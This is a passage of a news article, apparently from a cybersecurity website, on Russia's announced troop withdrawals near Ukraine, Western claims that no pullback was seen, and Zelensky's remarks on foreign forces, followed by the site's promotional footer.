Moscow has made several announcements of troop withdrawals this week and on Thursday said that units of the southern and western military districts, including tank units, had begun returning to their bases from near Ukraine.

Defense ministry spokesman Igor Konashenkov said some troops had returned to their garrisons in several areas far from the border, including Chechnya and Dagestan in the North Caucasus, and near Nizhny Novgorod, some 300 kilometers (185 miles) east of Moscow.

After previously announced withdrawals earlier this week, the United States, NATO and Ukraine all said they had seen no evidence of a pullback, with Washington saying Russia had in fact moved 7,000 more troops near the border.

Zelensky said Thursday his country was not looking for foreign forces within its borders.

“We have no need for soldiers with foreign flags on our territory. We are not asking for that. Otherwise, the entire world would be destabilized,” he told the RBK Ukraine website.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose
1...444546...79Page 45 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.